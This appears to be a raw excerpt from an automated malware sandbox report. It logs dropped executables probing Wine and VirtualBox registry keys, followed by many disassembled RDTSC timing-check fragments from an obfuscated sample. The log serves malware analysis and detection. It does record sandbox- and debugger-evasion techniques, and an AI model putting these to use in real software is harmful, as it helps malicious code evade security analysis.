Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD4310 second address: CD3BE3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8854FD885Ch 0x00000008 jg 00007F8854FD8856h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 jg 00007F8854FD8857h 0x00000019 push dword ptr [ebp+122D0D25h] 0x0000001f pushad 0x00000020 mov si, ax 0x00000023 popad 0x00000024 call dword ptr [ebp+122D1C98h] 0x0000002a pushad 0x0000002b clc 0x0000002c xor eax, eax 0x0000002e cld 0x0000002f mov edx, dword ptr [esp+28h] 0x00000033 mov dword ptr [ebp+122D1D62h], edi 0x00000039 mov dword ptr [ebp+122D2DD9h], eax 0x0000003f add dword ptr [ebp+122D1D62h], ebx 0x00000045 mov esi, 0000003Ch 0x0000004a cmc 0x0000004b add esi, dword ptr [esp+24h] 0x0000004f pushad 0x00000050 add dword ptr [ebp+122D1D62h], esi 0x00000056 mov dword ptr [ebp+122D1D62h], ecx 0x0000005c popad 0x0000005d lodsw 0x0000005f mov dword ptr [ebp+122D1D62h], ecx 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 cmc 0x0000006a mov ebx, dword ptr [esp+24h] 0x0000006e pushad 0x0000006f mov edi, dword ptr [ebp+122D2C21h] 0x00000075 movsx ecx, ax 0x00000078 popad 0x00000079 jmp 00007F8854FD8864h 0x0000007e push eax 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 popad 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E52929 second address: E52934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8854FAEB86h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E52934 second address: E5294A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD8860h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5294A second address: E5294E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5294E second address: E52961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F8854FD8856h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4185F second address: E41871 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F8854FAEB86h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E41871 second address: E41875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E41875 second address: E41882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E41882 second address: E41894 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F8854FD885Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51A0D second address: E51A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51A28 second address: E51A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8854FD8856h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jnc 00007F8854FD8856h 0x00000014 jmp 00007F8854FD8867h 0x00000019 ja 00007F8854FD8856h 0x0000001f popad 0x00000020 jmp 00007F8854FD885Eh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51A6C second address: E51A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51BB7 second address: E51BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51BBB second address: E51BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8854FAEB95h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51D6C second address: E51D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51D70 second address: E51D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51D76 second address: E51D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51D7C second address: E51D8F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8854FAEB8Eh 0x00000008 jl 00007F8854FAEB86h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51D8F second address: E51DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD8868h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jg 00007F8854FD8867h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E52119 second address: E52132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB95h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55DB5 second address: CD3BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 xor dword ptr [esp], 7B3031DFh 0x0000000d mov si, F0F2h 0x00000011 push dword ptr [ebp+122D0D25h] 0x00000017 mov dl, cl 0x00000019 call dword ptr [ebp+122D1C98h] 0x0000001f pushad 0x00000020 clc 0x00000021 xor eax, eax 0x00000023 cld 0x00000024 mov edx, dword ptr [esp+28h] 0x00000028 mov dword ptr [ebp+122D1D62h], edi 0x0000002e mov dword ptr [ebp+122D2DD9h], eax 0x00000034 add dword ptr [ebp+122D1D62h], ebx 0x0000003a mov esi, 0000003Ch 0x0000003f cmc 0x00000040 add esi, dword ptr [esp+24h] 0x00000044 pushad 0x00000045 add dword ptr [ebp+122D1D62h], esi 0x0000004b mov dword ptr [ebp+122D1D62h], ecx 0x00000051 popad 0x00000052 lodsw 0x00000054 mov dword ptr [ebp+122D1D62h], ecx 0x0000005a add eax, dword ptr [esp+24h] 0x0000005e cmc 0x0000005f mov ebx, dword ptr [esp+24h] 0x00000063 pushad 0x00000064 mov edi, dword ptr [ebp+122D2C21h] 0x0000006a movsx ecx, ax 0x0000006d popad 0x0000006e jmp 00007F8854FD8864h 0x00000073 push eax 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55F36 second address: E55F53 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8854FAEB8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnl 00007F8854FAEB86h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55F53 second address: E55FA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8863h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edx, 703CE63Bh 0x0000000f push edx 0x00000010 and edx, dword ptr [ebp+122D5AC5h] 0x00000016 pop ecx 0x00000017 push 00000000h 0x00000019 mov ecx, dword ptr [ebp+122D2D85h] 0x0000001f call 00007F8854FD8859h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F8854FD8867h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55FA3 second address: E55FB5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F8854FAEB86h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55FB5 second address: E55FE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F8854FD8869h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55FE2 second address: E56002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E56002 second address: E5608D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F8854FD8856h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007F8854FD8865h 0x00000017 pop eax 0x00000018 add dx, 55CAh 0x0000001d sbb si, 0A74h 0x00000022 push 00000003h 0x00000024 jmp 00007F8854FD8867h 0x00000029 push 00000000h 0x0000002b push 00000003h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F8854FD8858h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov esi, dword ptr [ebp+122D2BB9h] 0x0000004d add dword ptr [ebp+122D1E50h], edx 0x00000053 call 00007F8854FD8859h 0x00000058 jbe 00007F8854FD885Eh 0x0000005e push ecx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5608D second address: E560C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F8854FAEB93h 0x0000000d jmp 00007F8854FAEB97h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E560C3 second address: E560F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8854FD8856h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F8854FD8862h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8854FD8860h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E560F9 second address: E5611F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8854FAEB8Ah 0x00000008 jmp 00007F8854FAEB8Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5611F second address: E5612E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F8854FD8856h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5612E second address: E56185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b sub si, B6A8h 0x00000010 lea ebx, dword ptr [ebp+12455D1Dh] 0x00000016 clc 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 jmp 00007F8854FAEB90h 0x0000001e jmp 00007F8854FAEB8Fh 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push esi 0x00000029 pop esi 0x0000002a je 00007F8854FAEB86h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5620E second address: E56212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E56212 second address: E5627C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edx 0x0000000e popad 0x0000000f add dword ptr [esp], 0BB5653Ah 0x00000016 mov ecx, dword ptr [ebp+122D2DADh] 0x0000001c push 00000003h 0x0000001e pushad 0x0000001f push eax 0x00000020 adc ebx, 30B293F4h 0x00000026 pop esi 0x00000027 mov ecx, dword ptr [ebp+122D2CDDh] 0x0000002d popad 0x0000002e push 00000000h 0x00000030 push 00000003h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F8854FAEB88h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c xor edi, 1C7FFE00h 0x00000052 mov di, 6C83h 0x00000056 push 8CBEFDB5h 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5627C second address: E562B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 add dword ptr [esp], 3341024Bh 0x0000000e mov edi, 51330CD5h 0x00000013 lea ebx, dword ptr [ebp+12455D28h] 0x00000019 mov edx, dword ptr [ebp+122D2D65h] 0x0000001f push eax 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007F8854FD8863h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3C82F second address: E3C833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E737DD second address: E737E8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F8854FD8856h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7391C second address: E73922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73A9F second address: E73AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73C3F second address: E73C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73C45 second address: E73C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73C4B second address: E73C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DB9 second address: E73DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DC1 second address: E73DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8854FAEB8Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DD0 second address: E73DE2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8854FD8858h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DE2 second address: E73DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DE6 second address: E73DEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DEE second address: E73DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DF6 second address: E73DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E741EE second address: E741F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E74782 second address: E74787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E74787 second address: E7478C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E74E59 second address: E74E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8854FD8856h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8854FD885Ah 0x00000012 jmp 00007F8854FD885Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75013 second address: E75031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB98h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75031 second address: E75035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75035 second address: E7505D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F8854FAEB91h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007F8854FAEB86h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7505D second address: E75066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E751B5 second address: E751B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75621 second address: E75631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD885Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75631 second address: E75636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79098 second address: E790A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8854FD8856h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7DDC9 second address: E7DDEF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F8854FAEB86h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8854FAEB97h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7DDEF second address: E7DE26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8865h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jl 00007F8854FD885Eh 0x00000013 push edx 0x00000014 jns 00007F8854FD8856h 0x0000001a pop edx 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f jg 00007F8854FD8858h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7CE6B second address: E7CE70 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E484B8 second address: E484BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E81E13 second address: E81E19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E820E1 second address: E82110 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8862h 0x00000007 jmp 00007F8854FD885Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F8854FD885Ah 0x00000013 push ecx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8226A second address: E82271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E82271 second address: E82284 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8854FD885Eh 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E823E0 second address: E823E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
